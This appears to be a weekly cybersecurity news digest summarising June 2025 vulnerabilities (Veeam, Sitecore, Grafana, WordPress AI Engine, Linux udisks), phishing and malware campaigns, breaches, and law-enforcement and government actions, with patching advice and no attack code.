Cybersecurity News Review - Week 25 (2025)
This week brought major security flaws in Sitecore (hardcoded password "b"), WordPress AI Engine, and Linux systems, while hackers increasingly used SVG attachments for phishing and started focusing on U.S. insurance companies. Critical patches needed across multiple platforms as threat actors evolve their attack methods.
New Veeam RCE flaw lets domain users hack backup servers
Veeam has released security updates for critical vulnerabilities in its Backup & Replication software, including CVE-2025-23121, a remote code execution flaw affecting domain-joined installations that can be exploited by any authenticated domain user. This vulnerability, fixed in version 12.3.2.3617, adds to a series of RCE flaws in VBR that have been actively targeted by ransomware groups such as Frag, Akira, and Fog. Many organizations have made themselves vulnerable by joining backup servers to Windows domains against Veeam's security best practices. VBR servers are particularly attractive targets for threat actors because they can facilitate data theft and prevent recovery by deleting backups before deploying ransomware, making timely patching critical for Veeam's extensive customer base of over 550,000 organizations worldwide.
Over 100,000 WordPress Sites Exposed to Privilege Escalation via MCP AI Engine
A severe security vulnerability identified in the AI Engine WordPress plugin (versions 2.8.0-2.8.3) allows authenticated attackers with subscriber-level access to gain administrative control through privilege escalation, particularly affecting users who enabled the Dev Tools and MCP module. The flaw, designated CVE-2025-5071 with a CVSS score of 8.8, stems from inadequate permission checks that permit logged-in users to execute critical commands like "wp_update_user" even when Bearer Token authentication is implemented. After Wordfence's responsible disclosure on May 21, 2025, developer Jordy Meow promptly released a patch in version 2.8.4 on June 18, which enforces administrator-level capability checks and strengthens authentication processes, with WordPress administrators urged to update immediately.
Is b For Backdoor? Pre-Auth RCE Chain In Sitecore Experience Platform
A critical pre-authentication remote code execution (RCE) chain was discovered in Sitecore Experience Platform affecting versions 10.1 and later. The attack begins with hardcoded credentials for the sitecore\\ServicesAPI user, whose password was set to the single letter "b" in the product installer since version 10.1. Attackers can authenticate using these credentials by bypassing permission checks through the /sitecore/admin endpoint rather than the standard login path. Once authenticated, they can achieve RCE either through a ZIP slip path traversal vulnerability in the file upload functionality (allowing webshell upload to the webroot without knowing the full system path) or through an unrestricted file upload in the Sitecore PowerShell Extension. The vulnerabilities affect an estimated 22,000+ exposed Sitecore instances worldwide and demonstrate how enterprise CMS platforms continue to struggle with basic authentication security, with hardcoded credentials being embedded directly in the database seeding process during installation.
Over a Third of Grafana Instances Exposed to XSS Flaw
Security researchers at Ox Security have identified a high-severity vulnerability (CVE-2025-4123) in Grafana, affecting 36% of public-facing instances and numerous internal servers. The flaw, dubbed "the Grafana Ghost," is a cross-site scripting vulnerability that combines client path traversal and open redirect, allowing attackers to execute arbitrary JavaScript through malicious links. When exploited, attackers can change victims' usernames and login emails, reset passwords, and gain unauthorized access to Grafana accounts. This compromises sensitive operational data and could cause significant disruption by locking out legitimate users from critical monitoring systems. Though patched in May, researchers urge DevOps teams to immediately update their installations, as both public and locally-running instances remain vulnerable.
New Linux udisks flaw lets attackers get root on major Linux distros
Two newly discovered Linux vulnerabilities enable local privilege escalation to root access on major distributions. CVE-2025-6018 affects PAM configuration on SUSE systems, while CVE-2025-6019 impacts libblockdev's udisks daemon, which runs by default on most Linux systems. Qualys Threat Research Unit, which discovered both flaws, demonstrated successful exploits on Ubuntu, Debian, Fedora, and openSUSE, emphasizing that the udisks vulnerability poses a "critical, universal risk" requiring immediate patching due to its ubiquity and exploit simplicity. Organizations are urged to patch both vulnerabilities promptly to prevent complete system compromise, as root access enables persistence, lateral movement, and system tampering.
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels
Security researchers at Securonix have discovered an ongoing malware campaign called Serpentine#Cloud that uses Cloudflare tunnel subdomains to deploy stealthy, in-memory malicious code. The widespread attack, targeting victims in Western countries, Singapore, and India, begins with invoice-themed phishing emails containing disguised Windows shortcut files. When clicked, these launch a complex infection chain using batch scripts, VBScript, and Python to ultimately deliver AsyncRAT or Revenge RAT payloads that avoid detection by running entirely in memory. The attackers leverage Cloudflare's legitimate TryCloudflare tunneling services to host and deliver payloads, making their traffic blend with normal network activity while avoiding domain-blocking tools and complicating attribution efforts.
Phishing emails increasingly use SVG attachments to evade detection
Threat actors are increasingly utilizing Scalable Vector Graphics (SVG) attachments in phishing campaigns due to their versatility and ability to evade detection. Unlike pixel-based JPG or PNG files, SVGs use mathematical formulas to create images and can incorporate HTML and JavaScript elements. This capability allows attackers to embed phishing forms that steal credentials, download malware, or redirect users to malicious websites. Security researcher MalwareHunterTeam has identified recent examples demonstrating these techniques, which often display fake Excel spreadsheets with login forms or official-looking documents with download buttons. Because SVGs are primarily text-based, they typically receive minimal detection from security software. Recipients should treat SVG attachments with suspicion and consider deleting emails containing them unless specifically expected in a professional context.
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse
A Russian government-linked hacking team deployed a sophisticated phishing operation targeting high-profile individuals by impersonating US State Department officials in flawless English correspondence. After establishing trust through multiple exchanges, the hackers instructed victims to create a Google "app-specific password" and share it, bypassing two-factor authentication to gain persistent access to Gmail accounts. The operation, running from April to early June and tracked as UNC6293 (linked to APT29), featured meticulously crafted emails and documents likely polished with AI tools. Google has since revoked stolen passwords, locked affected accounts, and recommends enrolling in Advanced Protection and auditing for application-specific passwords.
AsyncRAT Campaign Continues to Evade Endpoint Detection
Halcyon has uncovered a sophisticated phishing campaign active since early 2024 that bypasses traditional security controls using legitimate services like TryCloudflare to deliver malware such as AsyncRAT. This campaign, likely orchestrated by a new or rebranded cybercriminal group, has affected thousands of organizations across multiple sectors, enabling remote surveillance, credential theft, lateral movement, data exfiltration, and ransomware deployment. The attack chain involves multi-stage execution beginning with phishing emails linking to cloud-hosted files, followed by obfuscated scripts and Python-based malware deployment. Halcyon detected this activity at the initial access stage when it evaded other endpoint protection tools, highlighting the need for layered defenses capable of detecting behavioral anomalies rather than relying solely on signature-based or reputation-based protection.
No, the 16 billion credentials leak is not a new data breach
Bleeping Computer clarifies that the widely reported "16 billion credentials leak" is not a new data breach but rather a compilation of previously leaked credentials gathered from infostealers, past data breaches, and credential stuffing attacks. These stolen credentials have likely been circulating for years before being aggregated into a database that was temporarily exposed online. Rather than panicking, users are advised to follow good cybersecurity practices: scanning devices for malware, using unique passwords for each site, employing password managers, and enabling two-factor authentication through authentication apps instead of SMS.
Telecom giant Viasat breached by China's Salt Typhoon hackers
Viasat, a satellite communications company serving governments and various industries with approximately 189,000 U.S. broadband subscribers, has been breached by China's Salt Typhoon cyber-espionage group. The company discovered the unauthorized access earlier this year and worked with federal authorities on the investigation, claiming the incident has been remediated with no customer impact. This breach follows a previous 2022 attack by Russian hackers and is part of Salt Typhoon's larger campaign targeting telecommunication providers worldwide, including major U.S. companies like AT&T and Verizon, where the group accessed law enforcement wiretapping platforms and communications of U.S. government officials.
Hackers switch to targeting U.S. insurance companies
Google Threat Intelligence Group warns that Scattered Spider hackers are targeting U.S. insurance companies, following their pattern of sector-by-sector attacks. The group, known for sophisticated social engineering, has breached multiple insurance firms, including Philadelphia Insurance Companies and Erie Insurance, which recently experienced system outages. Scattered Spider typically bypasses security through phishing, SIM-swapping, and MFA manipulation before potentially deploying ransomware like RansomHub, Qilin, or DragonForce. Security experts recommend comprehensive visibility across infrastructure, strong authentication practices, identity segregation, and employee education about impersonation attempts to defend against these attacks.
US recovers $225 million of crypto stolen in investment scams
The U.S. Department of Justice has seized over $225 million in cryptocurrency related to investment fraud and money laundering, marking the largest crypto seizure in U.S. Secret Service history. Investigators traced funds stolen from more than 400 victims through blockchain analysis, uncovering a sophisticated laundering network that executed hundreds of thousands of transactions to conceal the illicit source. The operation involved collaboration between the DOJ, FBI, Secret Service, Tether, and TRM Labs, which identified 144 OKX accounts connected to what appears to be an organized fraud ring using Vietnamese documentation. Despite complex obfuscation attempts, investigators successfully mapped the laundering network, allowing Tether to freeze and transfer the equivalent tokens to the government for potential victim restitution.
Police seizes Archetyp Market drug marketplace, arrests admin
International law enforcement authorities from six countries successfully dismantled Archetyp Market, a major darknet drug marketplace operating since May 2020. The joint operation, codenamed 'Deep Sentinel,' resulted in the arrest of the 30-year-old German administrator in Spain, along with one moderator and six high-profile vendors in Germany and Sweden. The marketplace had accumulated over 612,000 users, facilitated approximately $289 million in Monero cryptocurrency transactions, and featured more than 3,200 vendors selling various drugs through 17,000 listings. During the operation, authorities seized numerous electronic devices, narcotics, and assets worth €7.8 million, effectively eliminating what Europol's Deputy Executive Director called "one of the dark web's longest-running drug markets."
OpenAI to Help DoD With Cyber Defense Under New $200 Million Contract
OpenAI has launched "OpenAI for Government" and received a $200 million contract from the US Department of Defense to enhance AI capabilities, particularly for cyber defense. The pilot program with the DoD's Chief Digital and Artificial Intelligence Office aims to transform administrative operations, improve healthcare for service members and families, streamline program data analysis, and support proactive cyber defense. OpenAI emphasized that all applications must comply with their usage policies, while the DoD stated the funding will develop prototype frontier AI capabilities for national security challenges in both warfighting and enterprise domains. Industry experts view this partnership as practical, given the rapid advancement of AI technology and the government's need to leverage external expertise rather than building capabilities internally.
UK Government Publishes Plan to Boost Cyber Sector Growth
The UK government has launched a Cyber Growth Action Plan to enhance national cyber resilience following recent high-profile attacks on retailers. Led by experts from Bristol University and Imperial College London, the plan will assess cyber goods and services markets and explore emerging technologies like AI and quantum computing. The government is investing £16m in existing programs: £10m for CyberASAP to help academics commercialize research, aiming to create 25 new spin-out companies by 2030, and £6m for Cyber Runway to support cybersecurity startups. This initiative follows costly cyber attacks on major UK retailers, including Marks & Spencer, which Chancellor Pat McFadden described as a "wake-up call," and will inform the forthcoming National Cyber Strategy and Cyber Security and Resilience Bill.
Subscribe and come back next week to get another quick overview of recent industry events. Did I miss any news that you found useful from this week? Please add them to the comment section.